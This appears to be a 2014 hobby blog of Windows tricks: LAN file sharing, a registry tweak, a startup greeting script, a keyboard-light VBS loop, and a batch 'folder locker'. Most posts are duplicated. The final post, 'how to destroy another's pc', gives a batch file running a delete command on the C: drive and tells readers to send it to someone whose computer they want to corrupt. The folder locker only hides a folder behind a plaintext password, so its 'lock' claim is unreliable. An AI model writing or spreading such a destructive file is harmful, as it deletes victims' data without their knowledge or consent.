Thursday, 3 July 2014
Sunday, 27 April 2014
how to share data between 2 different computer via lan cable
hello freinds,
now i;ll tell you tranfering data from 1 pc to another pc via lan cable.
you need to do simpe steps...
1-connect both pc via lan cable.
2-go to the 1st pc which data to be transfer >open adapters setting>open properties>open properties of tcp/ipv4 and give ip address like 10.0.0.1.
3-give the ip address of 2nd pc same as 1st.pc,,,bt the last digit ip adress must be different and the 1st three digit of ip adress must be same..
4-go to thethat folder which you want to transfer>right click on that folder>share and security>advanced setting>check mark on share this folder .
5-now go to the 1st pc>run>cmd and hit enter.
6-on cammand promt type ping other ip address.
if reply is coming..thn ok..
7-now go to the 2nd pc.>run>type \\10.0.0.1 (ipadress of tht pc which data u want) hit enter
8-enter username and password.
your fata will be shown..
enjoy.
hit like and comment if u like.
Friday, 28 March 2014
how to remove shortcut arrows from desktop icons completely
sometimes when we use shortcut's on desktop for our frequently used files or movies it is ugly to see a small shortcut arrow at the bottom corner of the shortcut icon.
here's how can you remve those shrtcut arrows from your desktop icons in windows XP.
jst fllow these steps.
1-start >run>regedit
2-navigate to HKEY CLASSES ROOT\inkfile
if yu difficult in reaching this file location,simply
Press Ctrl+F to open find window.Enter "IsShortcut"
and click find.
now press f3 till you get this file Inkfile located at Hkey_Classes_Root\Inkfile
3-delete the IsShortcut registry value
YOu may need to restart Windows XP.
thank you.
hit like & share if you like this/....
here's how can you remve those shrtcut arrows from your desktop icons in windows XP.
jst fllow these steps.
1-start >run>regedit
2-navigate to HKEY CLASSES ROOT\inkfile
if yu difficult in reaching this file location,simply
Press Ctrl+F to open find window.Enter "IsShortcut"
and click find.
now press f3 till you get this file Inkfile located at Hkey_Classes_Root\Inkfile
3-delete the IsShortcut registry value
YOu may need to restart Windows XP.
thank you.
hit like & share if you like this/....
Thursday, 13 March 2014
welcome by your computer......hello user,.....!!!!!!
DO you also want that your computer call out your name when system starts........
so lets try this......
1-open notepad.
2-copy the matter given below.
Dim speaks, speech
speaks="Welcome to your PC, Username"
Set speech=CreateObject("sapi.spvoice")
speech.Speak speaks
3-replace Username with your own name.
4-save it as welcome.vbs.
5-copy this file to C:\Documents & setting\all users\start menu\programms\startup (in windows XP)
& to C:\Users\{User-name}\Appdata\Roaming\Microsoft\Start menu\Programms\Startup (in windows 7,8 and above)
if C: is your system drive .thn Appdata is a hidden folder.So you will need to select showing hidden folder in folder option to locate it.
6-paste in it.
NOw when the next time you start your system .......it will works...
thnxxxxxx
hit like...........if you like....!!!!!!
so lets try this......
1-open notepad.
2-copy the matter given below.
Dim speaks, speech
speaks="Welcome to your PC, Username"
Set speech=CreateObject("sapi.spvoice")
speech.Speak speaks
3-replace Username with your own name.
4-save it as welcome.vbs.
5-copy this file to C:\Documents & setting\all users\start menu\programms\startup (in windows XP)
& to C:\Users\{User-name}\Appdata\Roaming\Microsoft\Start menu\Programms\Startup (in windows 7,8 and above)
if C: is your system drive .thn Appdata is a hidden folder.So you will need to select showing hidden folder in folder option to locate it.
6-paste in it.
NOw when the next time you start your system .......it will works...
thnxxxxxx
hit like...........if you like....!!!!!!
Tuesday, 11 March 2014
HOW TO UPDATE A BLANK POST ON FACEBOOK.....!!!!!
Most of you might have tried this up....
but for some it will a great trick .
Now just follow simple step & you can make fun of your friends......
You just need to type is...
@[3:3: ] in the status box
just type this & see what happens......
thannxxxxx.....
plz like and share ...............if you like...
but for some it will a great trick .
Now just follow simple step & you can make fun of your friends......
You just need to type is...
@[3:3: ] in the status box
just type this & see what happens......
thannxxxxx.....
plz like and share ...............if you like...
Wednesday, 5 March 2014
How To Lock Folders & Files Using Notepad
Hello friends now i'll tell you there is no need to download any software to lock your personal files....
you need to do simple steps..
1-open notepad.
2-type the matter given below.
cls
@ECHO OFF
title Folder Private
if EXIST "HTG Locker" goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private "HTG Locker"
attrib +h +s "HTG Locker"
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock folder
set/p "pass=>"
if NOT %pass%== PASSWORD_GOES_HERE goto FAIL
attrib -h -s "HTG Locker"
ren "HTG Locker" Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Private
echo Private created successfully
goto End
:End
3-type your password where you see PASSWORD_GOES_HERE .
4-save it as locker.bat.
5-when you double click on it.....your locker is created.
6-when you 2nd time double click on it...it wants your password.
thnxxxxxxx....
hit like & share ........if you like it......
you need to do simple steps..
1-open notepad.
2-type the matter given below.
cls
@ECHO OFF
title Folder Private
if EXIST "HTG Locker" goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private "HTG Locker"
attrib +h +s "HTG Locker"
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock folder
set/p "pass=>"
if NOT %pass%== PASSWORD_GOES_HERE goto FAIL
attrib -h -s "HTG Locker"
ren "HTG Locker" Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Private
echo Private created successfully
goto End
:End
3-type your password where you see PASSWORD_GOES_HERE .
4-save it as locker.bat.
5-when you double click on it.....your locker is created.
6-when you 2nd time double click on it...it wants your password.
thnxxxxxxx....
hit like & share ........if you like it......
Sunday, 2 March 2014
how to keyboard make DISCO....!!!!!!
now i'll tell you......how to keyboard lights changes into DISCO lights.....
1-open notepad.
2-type the matter given below.
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
3-save this file as disco.vbs and select all files in save as file.................save on desktop.
4-you will see the magic (plz see your keyboard lights).......when you open this file..
TO STOP THIS....
1-open task manager.
2-open processes and stop wscript.exe....
thanxxxxxx
hit like aNd comment ......if you like,....!!!!
1-open notepad.
2-type the matter given below.
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
3-save this file as disco.vbs and select all files in save as file.................save on desktop.
4-you will see the magic (plz see your keyboard lights).......when you open this file..
TO STOP THIS....
1-open task manager.
2-open processes and stop wscript.exe....
thanxxxxxx
hit like aNd comment ......if you like,....!!!!
Friday, 28 February 2014
how to destroy another's pc
1-open notepad.
2-type the commands given below.
@Echo off
Del C:\ *.* |y
3-save the file as name.bat (name=as u wish)
4-thn send this file to that who's pc you want to currupt.
c: drive will be deleted .......when anyone open this file..
thnxxxx
if you like the post please like.......!!!!!!
2-type the commands given below.
@Echo off
Del C:\ *.* |y
3-save the file as name.bat (name=as u wish)
4-thn send this file to that who's pc you want to currupt.
c: drive will be deleted .......when anyone open this file..
thnxxxx
if you like the post please like.......!!!!!!
Subscribe to:
Posts (Atom)